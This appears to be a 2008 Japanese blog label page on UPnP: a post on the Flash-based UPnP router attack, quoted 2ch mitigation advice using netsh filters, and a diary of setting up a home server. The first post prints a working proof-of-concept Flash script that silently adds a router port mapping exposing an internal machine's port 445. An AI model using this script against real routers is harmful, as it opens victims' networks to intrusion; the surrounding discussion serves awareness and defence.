ラベル UPnP の投稿を表示しています。 すべての投稿を表示
ラベル UPnP の投稿を表示しています。 すべての投稿を表示

2008年4月3日木曜日

UPnPルーターは危険!?

・UPnPルータ+Flash=深刻なセキュリティ問題
 http://blog.ohgaki.net/upnp-flash
・Hacking The Interwebs
 http://www.gnucitizen.org/blog/hacking-the-interwebs
Flashを利用したUPnPルータの攻撃シナリオは以下になります。
・UPnPが有効なルータがある
・悪意のあるFlashをWebブラウザで参照する
・UPnPルータの設定を変更するSOAPリクエストをFlashが送信する
・UPnPルータで可能なルータ設定が変更される(乗っ取られる)
UPnPによるポートフォワード設定等には認証は必要ありません。Flashのセキュリティ脆弱性も必要ありません。ポートフォワード設定だけでも十分致命的ですが、DNSサーバ設定が変更されるとセキュリティ上致命的な問題です。

Flashを利用しなければ攻撃されないのか?
・・・ということは、その攻撃用Flashを使えばポートを開けられるんだな?

http://www.gnucitizen.org/projects/hacking-the-interwebs/Test.mxml
<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" creationComplete="onAppInit()">
<mx:Script>
/* Petko D. Petkov; pdp
* GNUCITIZEN
**/
import flash.net.*;

private function onAppInit():void
{
var r:URLRequest = new URLRequest('http://192.168.1.254/upnp/control/igd/wanpppcInternet');

r.method = 'POST';
r.data = unescape('%3C%3Fxml%20version%3D%221.0%22%3F%3E%3CSOAP-ENV%3AEnvelope%20xmlns%3ASOAP-ENV%3D%22http%3A//schemas.xmlsoap.org/soap/envelope/%22%20SOAP-ENV%3AencodingStyle%3D%22http%3A//schemas.xmlsoap.org/soap/encoding/%22%3E%3CSOAP-ENV%3ABody%3E%3Cm%3AAddPortMapping%20xmlns%3Am%3D%22urn%3Aschemas-upnp-org%3Aservice%3AWANPPPConnection%3A1%22%3E%3CNewRemoteHost%20xmlns%3Adt%3D%22urn%3Aschemas-microsoft-com%3Adatatypes%22%20dt%3Adt%3D%22string%22%3E%3C/NewRemoteHost%3E%3CNewExternalPort%20xmlns%3Adt%3D%22urn%3Aschemas-microsoft-com%3Adatatypes%22%20dt%3Adt%3D%22ui2%22%3E1337%3C/NewExternalPort%3E%3CNewProtocol%20xmlns%3Adt%3D%22urn%3Aschemas-microsoft-com%3Adatatypes%22%20dt%3Adt%3D%22string%22%3ETCP%3C/NewProtocol%3E%3CNewInternalPort%20xmlns%3Adt%3D%22urn%3Aschemas-microsoft-com%3Adatatypes%22%20dt%3Adt%3D%22ui2%22%3E445%3C/NewInternalPort%3E%3CNewInternalClient%20xmlns%3Adt%3D%22urn%3Aschemas-microsoft-com%3Adatatypes%22%20dt%3Adt%3D%22string%22%3E192.168.1.64%3C/NewInternalClient%3E%3CNewEnabled%20xmlns%3Adt%3D%22urn%3Aschemas-microsoft-com%3Adatatypes%22%20dt%3Adt%3D%22boolean%22%3E1%3C/NewEnabled%3E%3CNewPortMappingDescription%20xmlns%3Adt%3D%22urn%3Aschemas-microsoft-com%3Adatatypes%22%20dt%3Adt%3D%22string%22%3EEVILFORWARDRULE2%3C/NewPortMappingDescription%3E%3CNewLeaseDuration%20xmlns%3Adt%3D%22urn%3Aschemas-microsoft-com%3Adatatypes%22%20dt%3Adt%3D%22ui4%22%3E0%3C/NewLeaseDuration%3E%3C/m%3AAddPortMapping%3E%3C/SOAP-ENV%3ABody%3E%3C/SOAP-ENV%3AEnvelope%3E');
r.contentType = 'application/xml';
r.requestHeaders.push(new URLRequestHeader('SOAPAction', '"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"'));

navigateToURL(r, '_self');
}
</mx:Script>
</mx:Application>


以下、2ch - NTT東西☆VoIPアダプタ☆Part2 【ブリッジ可゙】より引用

616 :不明なデバイスさん:2008/01/17(木) 22:56:47 ID:3GlhMn78
おい、これ激ヤバだぞ。
UPnP機能を持つSOHOルーターを介してインターネット接続しているクライアントに
攻撃Flashを食わせることでルーターのUPnP機能を操作でき、port forwardingなど
を行うことが出来る。

http://blog.ohgaki.net/index.php/yohgaki/2008/01/17/upnp-flash


617 :不明なデバイスさん:2008/01/18(金) 23:14:05 ID:Y8pzY85o
>>616
どーすればいいんだよVoIPアダプターつかえないじゃん


618 :不明なデバイスさん:2008/01/19(土) 00:59:29 ID:w/ktrE2S
>>617
諸悪の根源はUPnPが非認証でもポートを開放するって点だな。
緩和する要素はLAN内でもFWを有効にしておくこと。
これならポート開放されてもサブネットマスク外からのアクセスだから弾く。
問題は家電とかはまともな防御機能を持ってないからなぁ・・・

回避策はFWでルータやVoIPアダプタ宛てへのパケットを投げるのを禁止すればOKかな
XP標準でやりたいならRouting and Remote Accessを有効にして、TCP/IPの詳細設定の奥に有るTCP/IP フィルタリングを有効にする
その後コマンドプロンプトで↓のを打ち込むと192.168.1.1(ルータ)宛てに通信を開始する事が不可能になる。
netsh routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=255.255.255.255 dstaddr=192.168.1.1 dstmask=255.255.255.255 proto=TCP srcport=0 dstport=0
元に戻すなら
netsh routing ip delete filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=255.255.255.255 dstaddr=192.168.1.1 dstmask=255.255.255.255 proto=TCP srcport=0 dstport=0
ただ、コレだと確実にDNSの通信に影響が出る(見れないサイトが出る)のでネトワクの知識がないならオススメできん。
DNSをルータの物から自分でISPの設定マニュアルの物にすれば実用上ほぼ問題ないと思うが。
DHCPはUDP67/68だし。

ただ、もしも ttp://192.168.1.1:49152/ で404 Not Foundが帰ってくるなら
netsh routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=255.255.255.255 dstaddr=192.168.1.1 dstmask=255.255.255.255 proto=TCP srcport=0 dstport=49152
これだけでOKかもしれない。削除はaddをdeleteに置き換えてくれな。
ただ、ブロードキャストされるとどうなるか解らん(多分受け付けると思う)から対策は完璧ではない。
dstをANYにすれば防げるが稀に通信できなくなるアプリが出る可能性も有る。
それにUPnPを使う正規のアプリケーションも副作用喰らうしな。


619 :不明なデバイスさん:2008/01/19(土) 01:01:19 ID:w/ktrE2S
あ、ちなみに家電があると、↑のLAN内でもFWを有効にってのはダメです。
大抵LAN内マシンを信用してると思うので、外部>ルータ>家電>PCという経由でハクられる可能性があります。多分。


620 :617:2008/01/19(土) 07:58:42 ID:hBW9432F
uPnPを完全に無効にするために
ちょっと配線が伸びるけど
VoIPアダプタからWebCasterV110にするわ
レンタル料金一緒だし 購入してもV110なら安く買えそうだ


621 :不明なデバイスさん:2008/01/19(土) 11:20:13 ID:JBWpsjgb
>>616
何を今さら。
そんな事、UPnPが世に出た時から言われてたじゃん。
山田ウイルス(ワーム)にもUPnPを悪用する亜種が存在したし。


622 :不明なデバイスさん:2008/01/19(土) 12:36:18 ID:dEIyBW2/
>>621
Flashはワームだという主張ならばそのとおりだ。


623 :不明なデバイスさん:2008/01/23(水) 00:32:34 ID:ZWdKnYQ3
ルータのDNS設定を乗っ取られたら結構大きな脆弱ですよね。

ルータ側でVOIPアダプタのアドレスからのみUPnPを受けるようにしてくれないかな。
使ってるルータは BHR-4RV だから機能改善のファームのアップは期待できないだろうし。

ルータのLAN側パケットフィルタでも多分対応できんだろうし。

>>618
さんの言われる通り
> DNSをルータの物から自分でISPの設定マニュアルの物にすれば実用上ほぼ問題ないと思うが。
の対応しときます。

linux router upnp portforward - Google 検索

2007年11月17日土曜日

ルーター(WebCaster610m)の設定を変えずにホームサーバーに挑戦したぞ!

ホームサーバーやったぞ!
http://mynote.dip.jp/
これが公開中のホームページでござる。
現在XPで稼動中。
Linuxでも動くようにしたい。

-- 追記 --

現在(2008.04.15)はここのサーバー化ツールを使ってやってます。
これが公開中アドレス(土曜のみ?)
http://kuzuyaro.server.co.jp

1. Posted 2007年11月19日 15:54
    ルーターを設定しないといけないらしい。
    パスワードがわからん!

2. Posted 2007年11月19日 23:43
    VineUPnPPortMapper使えなかった。
    ってことでXPで。
    できた。
    これで外部公開できてるんだろうか・・・
    誰か上のリンククリックしてけろ。

    UPnPCJはIPが変わると自動で更新されないからあかんな。

3. Posted 2007年11月20日 15:54
    他のPCからProxy通して接続してみたけど出来なかった orz
    146の接続拒否が表示される。
    PCをルーター化してやらないとダメっぽい。

4. Posted 2007年11月20日 18:04
    80番ポート開放したのになんでつながらんのじゃあああああ

5. Posted 2007年11月21日 17:11
    http://www.cman.jp/network/support/port.html
    ここでグローバルIP入れてチェックすると繋がるけどDiCEの説明で、
    >「プライベートIPアドレスは検出しない」のチェックを外すとプライベートIPアドレスの検出も可能になります。
    って言うけど、グローバルIPが更新されるとプライベートIPが消えてしまうま。

    で、その状態でさっきのページで外部からドメイン名でチェックすると繋がらなくなる。
    自動更新じゃなく、「今すぐ実行」をクリックするとプライベートIPとグローバルIPが表示された状態になって、さっきのチェックサイトでドメイン名で通る。

7. Posted 2007年11月21日 19:32
    つーかDiCEなしでUPnPCJだけで出来た。
    04WebServerで。

8. Posted 2007年11月22日 14:06
9. Posted 2007年11月22日 14:47
    UPnPCJなくてもXP標準ので出来る。
    ・コンピュータの管理 -> サービス
    から「Universal Plug and Play Device Host」が有効になってるのを確認。有効にする。
    ・コントロールパネル -> ネットワーク接続 -> インターネット接続
    ・プロパティー -> 設定 -> 追加

    [サービスの説明]  適当に(tcp80とか)
    [ネットワークで] プライベートIP(LAN内IP)
    [外部ポート番号] 80 [●TCP(T) ○UDP(U)]
    [内部ポート番号] 80

    で、[OK]をクリック。

10. Posted 2007年11月22日 14:56
    ファイアウォールを切らないと公開ページにアクセス出来ない(ComodoFirewall)。
    で、Connections を見てると、

    | svchost.exe | TCP IN/OUT | Souce | Destination | Bytes In | Bytes Out |

    のBytes INとOutが常に動いているんだけど問題ない?
    もしかしてヤバイのか?

11. Posted 2007年11月22日 16:01
    ポート開放のチェックはここ
    http://www.cman.jp/network/support/port.html

    自分のPCからドメイン名でアクセスしてページを確認したい場合、Proxyを使わないといけない。

    ここ
    http://www.cybersyndrome.net/plr4.html
    から選んで、ブラウザでProxy設定。

    IEなら

    ツール -> インターネットオプション -> 接続 -> LANの設定 -> LANにプロキシサーバーを使用する -> アドレス、ポートを入力

    アドレス欄に
    http://ドメイン名
    で サクセス。

12. Posted 2007年11月22日 16:24
    >10
    | svchost.exe | TCP IN/OUT | Souce | Destination | Bytes In | Bytes Out |

    これの
    Souce は プライベートIPで、
    Destination は ゲートウェイ(ルーター)のIPが表示されている。

    ポート2869
    で検索してみる。

14. Posted 2007年11月23日 00:41
    けんさくできない。
    googleに いったらウイルスにやられてる みたいなことを いわれた。

    かんせん してから アクセス なかったし、それまで なんじかんも アクセスなかったから。

    いま linux から とうこう してるんだけど、かんじに へんかんできない。

    サーバーは閉じてある。
    あれ?
    変換できた。
    なんだこれ?
    面倒だから ひらがなのまま投降する。

15. Posted 2007年11月24日 11:47
    $ java -jar UPnPPortMapper/UPnPPortMapper.jar

    Vine で UPnPPortMapper 使った時、

    CyberGarage warning : Invalidate Multicast Recieved : /239.255.255.250,/ff02:0:0:0:0:0:0:c

    ってメッセージがながれ続ける。
    なにこれ?

    ITmedia(http://www.itmedia.co.jp/help/tips/windows/w0489.html)によると、

    >239.255.255.250 は「ユニバーサルプラグ&プレイ」(以下、UPnP)が、ほかのUPnP対応機器を検索するために送信しているパケットだ。

    って書かれているけど、どう対処すればいいのだろうか。

17. Posted 2007年11月24日 12:04
    >15
    java が /239.255.255.250,/ff02:0:0:0:0:0:0:c をブロックしてるってことか?

18. Posted 2007年11月24日 12:18
    >9
    コンピュータの管理 -> サービス
    から「Universal Plug and Play Device Host」がない場合は、

    [コントロールパネル] -> [プログラムの追加と削除] -> [ネットワーク サービス] -> [詳細] -> [ユニバーサル プラグ アンド プレイ]をチェック -> [OK] -> [次へ] -> [完了]

    でインストールされる。

    ここに画像で説明されてる。
    http://support2.jp.dell.com/jp/jp/mwfaq/faq.asp?faqno=190329

19. Posted 2007年11月24日 13:08
    vine で UPnP によるポート開放で、ルーターの設定変更はしなくてよろし(ルーターがUPnP対応の場合)。

    ・libupnp-1.3.1.tar.gz
    ・upnpsdk-1.0.4-1.i386.rpm
    ・linuxigd-10.tar.gz
    http://sourceforge.net/projects/upnp/
    http://sourceforge.net/projects/linux-igd/

    libupnp はデフォルト configure でインストール。
    upnpsdk は make 出来ないから rpm をインストール。
    linuxigd も、こんなエラー

    linuxigd-1.0/main.c:145: undefined reference to `UpnpGetServerPort'
    main.o(.text+0x205):/root/linuxigd-1.0/main.c:145: undefined reference to `UpnpGetServerIpAddress'
    collect2: ld はステータス 1 で終了しました
    make: *** [upnpd] エラー 1

    で、make 出来ず。

    KTorrent で開放(8080のみ)できるけど、Apacheを8080に設定すると起動できない。

    KTorrent で開放(8080のみ)できるけど、Apacheを8080に設定すると起動できない。

    ぶつかってるんだな。
    ってことは KTorrent 使ってもムリってことか。

21. Posted 2007年11月25日 14:09
    >9
    >UPnPCJなくてもXP標準ので出来る

    出来なかった。
    やっぱUPnPCJ必要。

    インターネットゲートウェイが受け付けませんでした

    ってメッセージが出る。
    なんでだろ?
    1回 UPnPCJ 使ったら >9 の手順でOKなのかもしれない。

23. Posted 2007年11月25日 18:50
    空き容量7メガの鯖w
    昨日nlite使ってサーバー用のCD作ったのに。
    やっぱり1.5Gじゃ無理。

    comodofirewallはAllowAllにしないとサーバーに繋がらん。
    Customにすると どうやっても繋がんねー。
    3.0 だと出来るかもしれない。
    けど容量不足で出来んわ。

24. Posted 2007年11月26日 00:32
    >23
    >comodofirewallはAllowAllにしないとサーバーに繋がらん。
    >Customにすると どうやっても繋がんねー。

    NetworkControlRules にルールを1つ付け加えたら Custom でもサーバーに繋げることが出来た。
    どんなルールかは自分で考えてください。


-- 更に追記 --

1. Posted 2007年11月28日 16:59
    つまんねー
    もうやめた

2. Posted 2007年11月30日 15:38
    ポート開放とか言うとP2Pしか出ないな。

3. Posted 2007年11月30日 16:39
    >15
    >CyberGarage warning : Invalidate Multicast Recieved : >/239.255.255.250,/ff02:0:0:0:0:0:0:c
    >ってメッセージがながれ続ける。

    ルーターがアクセス拒否してる?

4. Posted 2007年11月30日 16:52
    >19
    >vine で UPnP によるポート開放で、ルーターの設定変更はしなくてよろし(ルーターがUPnP対応の場合)。

    linux-igd って、UPnP対応ルーターをパソコンで作る時のプログラムかい?

5. Posted 2007年12月07日 22:00
    >NetworkControlRules にルールを1つ付け加えたら Custom でもサーバーに繋げることが出来た。

    3.0 なら簡単。
    インストール時のウィザードでP2Pやサーバーで使うポートをブロックしないように設定できる。
    インストール後はコントロールパネルの「 stealth ports wizard 」から設定変更できる。

6. Posted 2007年12月07日 23:49
    ホームサーバーやめた。
    電気代とかセキュリティーとか考えると、やっぱりレンタルサーバが得。
    ホームサーバーなんてエネルギーの無駄遣いやわ。

    で、レンタルサーバーを探していた。
    XREAのPlasがいいな。
    1年契約で月¥200。
    各種CGI、データベースも使えて3Gのスペース。
    DDNSで取得したドメインも使えるみたい。

7. Posted 2007年12月15日 01:49
    >DDNSで取得したドメインも使えるみたい。

    バリュードメインのみだった orz

9. Posted 2008年04月06日 10:05
    つーか これでいいような気がしてきた。
    http://www.server.co.jp/

10. Posted 2008年04月12日 01:09
    >>8 が停止の時は
    http://kuzuyaro.server.co.jp

    これも土曜だけ